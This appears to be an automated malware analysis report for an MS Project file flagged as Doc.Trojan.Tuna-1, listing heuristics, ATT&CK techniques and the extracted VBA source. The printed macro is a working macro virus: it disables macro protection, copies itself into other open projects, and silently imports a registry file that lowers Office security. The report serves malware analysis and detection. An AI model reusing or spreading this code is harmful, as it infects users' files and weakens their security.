MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros that attempt to disable macro protection and write specific registry keys, including `C:\tree.reg`, to `HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\MS Project\Security` and `HKEY_CURRENT_USER\Software\Microsoft\VBA\Office`. This behavior suggests an attempt to modify system settings or establish persistence. The ClamAV detection as 'Doc.Trojan.Tuna-1' further supports its malicious nature.
Heuristics 4
-
ClamAV: Doc.Trojan.Tuna-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Tuna-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2343 bytes |
SHA-256: 9d740e51e86b6dd85691eb24e565cb272fca5eaf12058b53958c1c4c49712df2 |
|||
|
Detection
ClamAV:
Doc.Trojan.Tuna-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Project_Activate(ByVal pj As Project) ' jubii = Version If jubii = "8.0" Then Application.MacroVirusProtection = False End If Application.DisplayAlerts = False Dim X As Project For Each X In Projects On Error Resume Next Set ap = X.VBProject.VBComponents(1).codemodule Set tp = ThisProject.VBProject.VBComponents(1).codemodule If ap.lines(2, 1) <> "'" Then ap.deletelines 1, ap.countoflines ap.insertlines 1, tp.lines(1, tp.countoflines) For i = 9 To ap.countoflines Randomize ma = Int((Rnd * 8) + 1) If ma <= 2 Then ap.insertlines i, "'" End If Next i Application.FileSaveAs Name:=ActiveProject.Name End If Next X Set temp = Application.VBE.VBProjects(1).VBComponents(1).codemodule If temp.lines(2, 1) <> "'" Then temp.deletelines 1, temp.countoflines temp.insertlines 1, tp.lines(1, tp.countoflines) For n = 9 To temp.countoflines Randomize ma = Int((Rnd * 4) + 1) If temp.lines(n, 1) = "'" And ma >= 2 Then temp.deletelines n, 1 je = je + 1 If je = 15 Then GoTo out End If Next n out: If jubii <> "8.0" Then Open "C:\tree.reg" For Output As 1 Print #1, "REGEDIT4" Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\MS Project\Security]" Print #1, """Level""=dword:00000001" Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\VBA\Office]" Print #1, """CodeForeColors""=""1 1 5 0 1 1 1 1 0 0 0 0 0 0 0 0 """ Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\VBA\Office]" Print #1, """CodeBackColors""=""1 1 0 7 6 0 0 0 0 0 0 0 0 0 0 0 """ Close 1 Shell "regedit /s c:\tree.reg", vbHide Kill "C:\tree.reg" End If If (Day(Now)) = 19 And (Month(Now)) = 11 Then MsgBox "Deeper spirals drowning , in seas bluer than you , tape ribbons flutter wet in the sky, Pulling at the loose threads Of your Soul", vbExclamation, "Proj-Tuna - dedicated to a good friend - happy birthday" End If If (Day(Now)) = 19 And (Month(Now)) = 11 And Hour(Now) > 12 Then MsgBox "Tuna ... its go0d for the Brain!!!", vbExclamation, "But is it good for the tuna??" End If End If '[ast] 'Tuna End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.